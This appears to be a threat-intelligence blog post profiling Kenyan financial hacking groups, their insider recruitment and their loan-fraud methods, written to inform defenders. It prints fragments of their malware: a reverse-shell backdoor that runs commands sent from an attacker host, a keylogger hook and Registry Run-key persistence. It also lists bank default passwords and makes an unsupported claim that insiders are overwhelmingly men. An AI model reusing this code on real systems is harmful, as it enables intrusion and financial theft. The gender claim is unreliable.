Loan Wipers – The Grapzone threat group.

Introducing Grapzone

Grapzone was a novice threat group which started around 2013-2014 just like all other threat groups, in a small Estate in Kasarani, Nairobi. This threat group begun with small-time heists, like clearing receipts from a supermarket, e.g they would penetrate the Supermarket billing system and produce a receipt of payment for a TV and then an insider would get that receipt printed for them. The ground teams working with GrapZone hackers would go pick the TV or any other expensive merchandise that was fraudulently purchased, which even included cookers and beds. During these attacks, they used an opensource RAT known as QuasarRAT written in C#.

Server connection settings used to set up QuasarRat through a zuku router tracked to Kasarani Estate.

Their initial keylogger, which had several similarities with HailMary logger, was used to target the Supermarket managerial offices, at the suburbs of Nairobi with keylogger data uploading into an account at cloud storage services. Apart from merchandise operations, their operators also crossed over into Air Tickets and Money Gram heists.

At the end of 2016, their main coders met the Forkbombo leader when it still was a group for tool exchange and joint operations as it evolved into a Cyber Cartel.

This is equally the time Fsociety keylogger, lately known by the Cyber Security Community as Hailmary keylogger was born.

As Grapzone joint operations went on, with the Larger crew, new tactics and techniques were also developed and they learnt that clearing loans from small financial institutions stealthily, in small chunks logged on directly to the DB might not be noticed. Furthermore, Cyber security back then was an after-thought.

During these stealthier operations, the AFTs deployed new tactics, developed new tools and learnt how to recruit insiders for prodigious, improved heists.

The first objective was to get an insider to provide an overview of the organizations’ infrastructure and send over WAN Topology to the attackers’ gmail account.

Topology is sent to the hackers, captured by OnNet CNO team.

With the insider in place, usually an ICT staff member, the adversaries study the materials, understand the environment and request the insider to assist with the installation of RUT backdoor.

With the Backdoor installed, the insider was given three files, one being the main Keylogger PE i.e HP.exe, the deployer which is clickme.bat and tutorial file, README.txt and briefed on who and which floor to target during the institution’s after hours. The files are shown as below respectively.

$ file HP.exe	
HP.exe: PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
$ strings HP.exe
!This program cannot be run in DOS mode.
T$ ;B
%s returned %d
Cannot allocate memory for ARCHIVE_STATUS
Cannot open self %s or archive %s
Failed to get executable path. 
GetModuleFileNameW: %s
Failed to convert executable path to UTF-8.
Cannot GetProcAddress for Py_DontWriteBytecodeFlag
Cannot GetProcAddress for Py_FileSystemDefaultEncoding
Cannot GetProcAddress for Py_FrozenFlag
Cannot GetProcAddress for Py_IgnoreEnvironmentFlag
Cannot GetProcAddress for Py_NoSiteFlag
Cannot GetProcAddress for Py_NoUserSiteDirectory
Cannot GetProcAddress for Py_OptimizeFlag
Cannot GetProcAddress for Py_VerboseFlag
Cannot GetProcAddress for Py_BuildValue
Cannot GetProcAddress for Py_DecRef
Cannot GetProcAddress for Py_EndInterpreter
Cannot GetProcAddress for Py_Finalize
Cannot GetProcAddress for Py_IncRef
Cannot GetProcAddress for Py_Initialize
opyi-windows-manifest-filename HP.exe.manifest
$ file clickMe.bat 
clickMe.bat: DOS batch file, ASCII text, with CRLF line terminators
Deployer batch file
$ cat README.txt 
HP.exe is the keylogger without ftp, saves in programdata.

1) Copy the file HP.exe in C:\programdata
2) Right click on the file clickme then 
   from the drop down menu click run as Administrator

From the backdoored server, RUT command shell is executed and the hackers using psexec.exe with the new credentials caught from the domain administrators, the intruders commence to laterally move from one workstation to another deploying keyloggers. During these days mimikatz was not popular in Kenyan AFT scenes, but OnNet Threat Intelligence team caught several other threat actors utilizing it in the wild as from early 2017.

In some machines, that the AFTs experienced anti keylogger systems, they quickly deployed ways to bypass the defense as below:

(0, 'AntiLogger', u'"C:\\Program Files (x86)\\AntiLogger\\AntiLogger.exe" /minimized', 1)

(1, 'IBM websphere', u'C:\\ProgramData\\oneNote.exe', 1)

As the adversaries continued to gather more Administration credentials collected by the keyloggers, scanning to find more systems in the data-center commenced on subnet. The scanner used at the time was Bopup Scanner which OnNet observed as very noisy during operations thus, it should have set off all the bells.

These scans targeted port 445, a protocol used for SMB and SAMBA services in the environment. The SMB – a Server Message Block, for sharing files, printers, serial ports and other network resources. Grapzone used psexec.exe to laterally control machines remotely and pivoted from one to another installing loggers and collecting keylogger data from sensitive systems in the targeted environment.

On gaining access to systems they needed, the AFTs would test the credentials and understand Database Processes for each system penetrated.

Testing credentials and the SQL statements

For the AFTs, this included understanding swift and other fintech systems.

And also understanding the commands to change accounts once privileged access to SQL is attained, which was a vital objective.

Account changes and manipulation.

The AFTs also managed to target small loan applications inside the institution and used SQL commands as below to modify data, especially from mid-2015.

INSERT INTO [t_productpackage] ([PackageID],[Description],[RepaymentProductID],[LoanProductID],[PackageClassID],[CurrencyID],[CreatedBy],[CreatedOn],[ModifiedBy],[ModifiedOn],[SupervisedBy],[SupervisedOn],[UpdateCount],[SavingProductID],[LoanProductID2],[BaseID])VALUES('HEMA','Loan On Phone(Hema Group)','CA01','JLN30','PACK01','KES','DTS','Mar 30 2015  4:36:00:000PM',NULL,NULL,NULL,NULL,1,'CA01','JLN30','03')
--Delete t_PackageRule  where RuleID ='PR0019'
INSERT INTO [t_ProductPackageRule] ([PackageID],[ActionID],[RuleID],[CreatedBy],[CreatedOn],[ModifiedBy],[ModifiedOn],[SupervisedBy],[SupervisedOn],[UpdateCount])VALUES('HEMA','LN_AUTO','PR019','SYS',getdate(),NULL,NULL,NULL,NULL,1)

Eventually the institution lost a huge amount of funds.

Indicators of Compromise

a) Writereg.exe

854af931642277b67ced45ba00a92803 write_reg.exe

from _winreg import *
import sys

reg_value = ""
reg_value = ''
for eachArg in sys.argv:
    print eachArg
    i += 1
    if (i == 2):
        reg_value = eachArg
print 'Registry Key:' + reg_value

aReg = ConnectRegistry(None,HKEY_LOCAL_MACHINE) #Connect to registry                                                  
print r"*** Writing to SOFTWARE\Microsoft\Windows\CurrentVersion\Run ***"
aKey = OpenKey(aReg, r"SOFTWARE\Microsoft\Windows\CurrentVersion\Run", 0, KEY_WRITE)
   SetValueEx(aKey,"HP DeskJet_",0, REG_SZ, reg_value) 
except EnvironmentError:                                          
    print "Encountered problems writing into the Registry..."
CloseKey(aReg)  #Close registry

b) AMD_intel.exe

backdoor that called Command and Control

55d50e7df1a96791ad9f35b10924354e AMD_intel.exe

c) kernelpatch.exe

Backdoor, collector of keylogger data to drivehq ftp service.

c5ea2ad669a58b9ba2e0795bf1117fbb kernelpatch.exe

Sample part of the code

print "Starting ...."
isNotConnected = True
while isNotConnected:
        print "Connecting to Server . ..."
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        # connect to attacker machine
        s.connect((HOST, PORT))
        isNotConnected = False
        print "Connected to Server: " + HOST + "at port: " + PORT
    except Exception, m33:
        print m33
        isNotConnected = True
# start loop
while 1:
         # Current Working Directory
         cwd = os.getcwd()
         print cwd + "#>"
         # recieve shell command
         #command = s.recv(1024)
         command = s.recv(PORT)
         print "Recved data: " + command
         # if its quit, then break out and close socket
         if command == "quit": break
             # if no data do nothing
         elif command == "":
             # Do nothing useful if there is no data stream
             m = 1 + 1
         elif command == "get_logs":
              s.send("Logs collection success, M3. R0dn3t!!")
         elif command == "deploy_logger":
              s.send("K3yl0883r upl04d3d succ3ssfully, M3. R0dn3t!!")
         else :
             # Send current working directory path to listener
             # s.send(cwd)
             # do shell command
             proc = subprocess.Popen(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
             # read output
             stdout_value = +
             # send output to attacker
             if stdout_value == "":
                  cwd = os.getcwd()
                   #print "Transmitted: " + stdout_value
    except Exception, e:
        print e

d) gestartup_apps.exe

b434bea29903bdccb77c0d0a1dc3684f gestartup_apps.exe

import os
from _winreg import *
FILE_NAME=os.getenv('programdata')+"\\" +LOGGED_IN+".xls"
f = open(FILE_NAME, 'a')
aReg = ConnectRegistry(None,HKEY_LOCAL_MACHINE) #Connect to registry
print r"*** Reading from SOFTWARE\Microsoft\Windows\CurrentVersion\Run ***"
aKey = OpenKey(aReg, r"SOFTWARE\Microsoft\Windows\CurrentVersion\Run") 
for i in range(1024):                                           
        n,v,t = EnumValue(aKey,i)
        print i, n, v, t
        verbose = i, n, v, t
        print verbose
        f.write(str(verbose) + '\n')
    except EnvironmentError:                                               
        print "You have",i," tasks starting at logon..."

e) HP.exe (keylogger)

a2dee5b98c9eedb6ee0fdf579f1319e0 HP.exe

f) pscan24.exe (scanner)

45d89c015fb0f3b1672540ed281d5dbe pscan24.exe

g) PSAttack.exe

a7ed154c98662b044cbaaf9dc9fb3a4d PSAttack.exe

The Insider Menace

95% of insider threats are usually men.

Insiders that communicate and facilitate adversary groups are typically trusted male employees, which is constituted by some sense of failure in their life or need of money and lack of success which still outlines to that sense of failure.

During majority of the engagements and CNE operations, OnNet CNO team develops and collects intelligence on the insider threats involved and usually ends up identifying, a male between the ages of 28-40 years old.

Kenyan AFTs

The six threat actors OnNet tracks in Kenyan are Nairobi based financial groups that broke up from the primary AFT, and all five of them have the same TTPs when they approach insiders except SilentCards.

SilentCards approaches anyone with physical access to the building often involving guards and janitors and then offers them money. The insider assists them with the delivery of a rogue laptop to the institution’s building.

With Examples

We have witnessed a Janitor/Cleaner photograph statements and software queries from an office late in the evening and send them to an AFT operator via social media as seen below.

Such surveillance helps the AFTs’ to understand the banking software used by the Financial institution.

The same AFTs have used a communications officer in a different instituton to get names of all Western Union tellers, their usernames and emails as seen below.

Though Forkbombo used to work well with SilentCards over a couple years, predominantly the former concentrate on the personnel with an ICT background, collecting OSINT on the subject via LinkedIn, Facebook and other Social media platforms. Then in no time, they will communicate with him, to assist with installation of RUT backdoor. We have witnessed them approach an Accountant with some ICT background as stated on his LinkedIn profile, and such malicious insider would not only aid with the backdoor installation but forward copies of email threads so that the AFTs can understand the inner working of the banks systems.

The screenshot below shows a thread that was forwarded over to the AFTs.

Several batches are usually forwarded depending on the demand.

Some emails contain balances during loan heists when the AFT needs to understand how loans are paid and the organization’s/client’s with bigger credit.

This was a big Modus Operandi for another Threat group OnNet tracks codenamed GrapZone which specialized in loan sabotage, credit manipulation and bill de-credit operations.

Getting statement details for accounts with huge loans was a major MO used by Grapzone, to clear loans quietly little by little without getting noticed.

Computer Network Defense

With the insider threats growing and evading several security checks, a lot of institutions are under attacks everyday.

Building a framework to spy (DITU) or setting up UEBA solutions on the employees can get disastrous and expensive, rather educating them and establishing a culture of accountability can minimize such risks and inflict less harm to the organization already targeted by the AFTs.

Tracking the 400 mil shillings AFT – SilentCards big come back.


Our CNO team that is selectively tasked with offensive operations to gather CTI, for our customers so as to arm them with the most accurate intelligence, stumbled on a server, early 2018, that was used for a larger heist late last year, where the actor made 400,000,000 + KSHs payday. Due to the fact the institution is not our client and has not directly or indirectly contacted us for approval to post this blog and the laws of Kenya do not agree we do so, we can’t name the affected institution, rather we can provide details of how such a heist occurs according to our research, observations and intel collection.

Threat Intelligence

SilentsCards threat actor is a home grown AFT and is an offshoot of Forkbombo Group. They started their robberies late 2017 and have been heisting organizations with lots of millions lost for the last one year. This group inherited the old version key logger used by Forkbombo and perfected it for collection of key logger data in a targeted environment.

The latest code used in several banks, after reversing has the main Def as OnKeyBoardEvent() and the file is usually saved up as

def OnKeyboardEvent(event):
    LOG_NEWACTIVE = wg.GetWindowText (wg.GetForegroundWindow())
        LOG_TEXT += " " + LOG_NEWACTIVE + " |\n"
        LOG_TEXT += "=" * len(LOG_NEWACTIVE) + "===\n\n"
        print LOG_NEWACTIVE

The second part specifies where the files logged are written into, by default SilentCards saves them in UserProfile as seen below with tar.gz as an extension to fool inexperienced analysts.

now =
COMPUTER_NAME= socket.gethostname()+" "+ socket.gethostbyname(socket.gethostname()) + ": "

By default, you will find these outputs in the home directory of the user who is logged, which by default happens when the users gets into their system after logging in.

The logger PE is usually copied and saved into Startup folder which is an older TTP, that ForkBombo group used back in 2015-2017 and then abandoned and started using Scheduled-tasks, Registry and Drivers for persistence.

SilentCards still saves them in startup directory as :

C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\PE.File.Executable

In short, SilentCards have not improved their operations to try defend their tactics in the long run, but there is a time, our Defenders ended up in a fire fight with SilentCards, as they tried to defend a module they used for CnC during a Breach Readiness service.

SilentCards are known to use AnyDesk for Remote Administration, they are known to use GoToMyPc since 2015, and with collaboration with PsExec, they can laterally move through the ICT Workstations deploying key logger and through the DataCenters dumping passwords and other essential access tokens with use of an open source tool called mimikatz.

Our CNO team observed as they collected Windows creds, and later targeted Card Center servers, by either looking for the server owners and collecting their SSHD credentials. By default most organizations usually have default passwords they set up for users, and on this bank they used three different default passwords.

a) admin123

b) welcome1

c) secret123

SilentCards was also interested on the initial entry to get into a box called Polarisprapp01 and Eqc-VC01. Using these two servers, just like their sister threat actor, Forkbombo group, they started coping all Audit Reports generated by the institutions from the auditors workstations for further review of the institutions situation awareness and Risk Analysis and copied them via Eqc-VC01 an internal server, to a C2 server overseas.

After collecting as many credentials as they could, 400 Million Kenya Shillings was moved in batches, crediting fictitious accounts, then accessed either via VISA/MASTERCARD overseas or with use of Mobile Money Transfers. Unlike Forkbombo which has several money mules, SilentCards relies a lot on foreigners for quick transactions outside the country.

Outlook on SilentCards

We believe this threat actor is still active in different infrastructures and is planning to attack another institution this Easter by running huge transactions. By raising community awareness, we intend to minimize damage and loss to your customers and to ours by maiming their activities and capabilities when exploiting infrastructures across East Africa.